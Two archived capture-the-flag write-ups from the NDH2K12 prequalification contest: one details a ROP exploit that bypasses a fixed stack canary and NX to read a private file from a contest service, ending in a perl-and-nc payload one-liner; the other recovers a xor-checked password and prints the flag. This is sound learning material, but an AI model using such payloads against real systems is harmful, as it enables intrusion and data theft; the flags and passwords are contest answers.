NDH2K12 Prequals: web3.ndh writeup (port 4005)

Written by Franck Michea, 2012-03-25 00:41:00

This articles was originally written for LSE Blog with w4kfu. It was archived here. Check this awesome blog out too!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
From: Piotr <piotr@megacortek.com>
To: LSE <lse@megacortek.com>
Subject: Another weird link
Attachments : web3.ndh

Thank you again for these informations! we have just credited your account
with $1700. Our spy thinks that Sciteek staff is aware about the mole
inside their building. He is trying to read a private file named
"sciteek-private.txt" located at sciteek.nuitduhack.com:4005. Please find
the .ndh attached, if you are sucessfull, reply with a message entitled
"complex remote service".

Of course, your efforts will be rewarded with $2500. Maybe you will find
pieces of informations about the mole.

Piotr

As before, we can easily execute this .ndh file in the VM we have to understand the behavior of the program, but this time we also had an IDA plugin to help us.

Program will reserve 0x200 bytes for the receveid buffer, and setup a canary on the stack at offset 0x200 avoiding stack based buffer overflow. But the canary is always the same value 0xbeef, this protection will be easy to bypass.

An another protection has been setup on this challenge, NX byte, instead of service 4004, we won't be able to execute code from our buffer. We will use ROP technics, to bypass it.

We figured out an excellent sub function (like in service 4000) "disp_file_content".

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
ROM:8201 disp_file_content:
ROM:8201                 PUSH           R1
ROM:8204                 PUSH           R2
ROM:8207                 PUSH           R3
ROM:820A                 PUSH           R4
ROM:820D                 PUSH           R5
ROM:8210                 MOVL           R1, 0
ROM:8215                 CALL           SYSCALL_OPEN
ROM:8219                 CMPL           R0, $FFFF
ROM:821E                 JNZ            file_valid
ROM:8221                 XOR            R0, R0
ROM:8225                 POP            R5
ROM:8227                 POP            R4
ROM:8229                 POP            R3
ROM:822B                 POP            R2
ROM:822D                 POP            R1
ROM:822F                 RET
ROM:8230 ; ---------------------------------------------------------------------------
ROM:8230
ROM:8230 file_valid:                             ; CODE XREF: disp_file_content+1D
ROM:8230                 MOV            R3, R0
ROM:8234                 MOVL           R1, 0
ROM:8239                 MOVL           R2, $2
ROM:823E                 CALL           SYSCALL_FSEEK
ROM:8242                 MOV            R4, R0
ROM:8246                 INC            R4
ROM:8248                 MOV            R0, R3
ROM:824C                 MOVL           R1, 0
ROM:8251                 MOVL           R2, 0
ROM:8256                 CALL           SYSCALL_FSEEK
ROM:825A                 SUB            SP, R4
ROM:825E                 MOV            R5, SP
ROM:8262                 MOV            R0, R3
ROM:8266                 MOV            R1, SP
ROM:826A                 MOV            R2, R4
ROM:826E                 CALL           SYSCALL_READ
ROM:8272                 ADD            R4, R5
ROM:8276                 DEC            R4
ROM:8278                 MOVBT          R4, 0
ROM:827C                 MOV            R0, R5
ROM:8280                 CALL           write_socket
ROM:8284                 MOVB           R0, 1
ROM:8288                 INC            R4
ROM:828A                 SUB            R4, R5
ROM:828E                 ADD            SP, R4
ROM:8292                 POP            R5
ROM:8294                 POP            R4
ROM:8296                 POP            R3
ROM:8298                 POP            R2
ROM:829A                 POP            R1
ROM:829C                 RET
ROM:829C ; End of function disp_file_content

Before calling this function we have to set R0 correctly to the file required file name ("sciteek-private.txt").

We will use these simple gadgets to change the value of R0 and quit program correctly:

1
2
3
4
5
6
ROM:80BD                 POP            R0
ROM:80BF                 RET

[...]

ROM:838C                 END

Scheme of exploitation looks like:

1
[file_name] [NULL_PADDING] [POP_R0;RET] [ADDR_BUFF] [disp_file_content] [END]

Here is the final exploit :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
perl -e 'print "sciteek-private.txt" . "\x00"x493 . "\xef\xbe" . "\xbd\x80" . "\xf4\x7b" . "\x01\x82" . "\x8c\x83"' | nc sciteek.nuitduhack.com 4005

Dear Patrick,

We found many evidences proving there is a mole inside our company who is selling confidential materials to our main competitor, Megacortek. We have very good reasons to believe that Walter Smith have sent some emails to a contact at Megacortek, containing confidential information.

However, these emails seems to have been encrypted and sometimes contain images or audio files which are apparently not related with our company or our business
, but one of them contains an archive with an explicit name.

We cannot stand this situation anymore, and we should take actions to make Mr Smith leave the company: we can fire this guy or why not call the FBI to handle this case as it should be.

Sincerely,

David Markham.

NDH2K12 Prequals: executable1.ndh writeup (port 4001)

Written by Franck Michea, 2012-03-25 00:40:00

This articles was originally written for LSE Blog. It was archived here. Check this awesome blog out too!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
From: Jessica <jessica@megacortek.com>
To: LSE <lse@megacortek.com>
Subject: unknown binary, need your help
Attachments : executable1.ndh

Hello again,

Thank you very much for your help. It is amazing that our technical staff and
experts did not manage to recover any of it: the password sounds pretty weak.
I will notify our head of technical staff.

Anyway, I forwarded them the file for further investigation. Meanwhile, we got
fresh news from our mystery guy. He came along with an intersting binary file.
It just looks like an executable, but it is not ELF nor anything our experts
would happen to know or recognize. Some of them we quite impressed by your skills
and do think you may be able to succeed here. I attached the file, if you discover
anything, please send me an email entitled "Strange binary file".

This will be rewarded, as usual. By the way, your account has just been credited
with $100.

Regards,
Jessica.

First binary of the contest, we just had cracked the rar of the first exercise, so we had the actual VM in C with its debugger. Waiting for the IDA plugin, we started looking at what it was doing with the disassembly given by the debugger.

The program was first printing a login prompt and then waiting for password input. Looking at the disassembly after entering the password, we easily figured out that it was doing a strlen of the password entered and checking it was 8 characters long.

It was then xoring each character one by one with something in memory and checking the value of the xor. Character by character, with the help of breakpoints in the debugger, We dumped the expected values and got the password: zApli8oW

Entering it in the service running on remote port 4001 gave the flag:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
<PSP version="1.99">
<MOTD>
<![CDATA[
Welcome on SciPad Protected Storage.

The most secure storage designed by Sciteek. This storage protocol
allows our users to share files in the cloud, in a dual way.

This daemon has been optimized for SciPad v1, running SciOS 16bits
with our brand new processor.
]]>
</MOTD>
<FLAG>
ea1670464251ea3b65afd624d9b17cd7
</FLAG>
<ERROR>
An unexpected error occured: PSP-UNK-ERR-001> application closed.
</ERROR>
</PSP>

Easy one, but nice.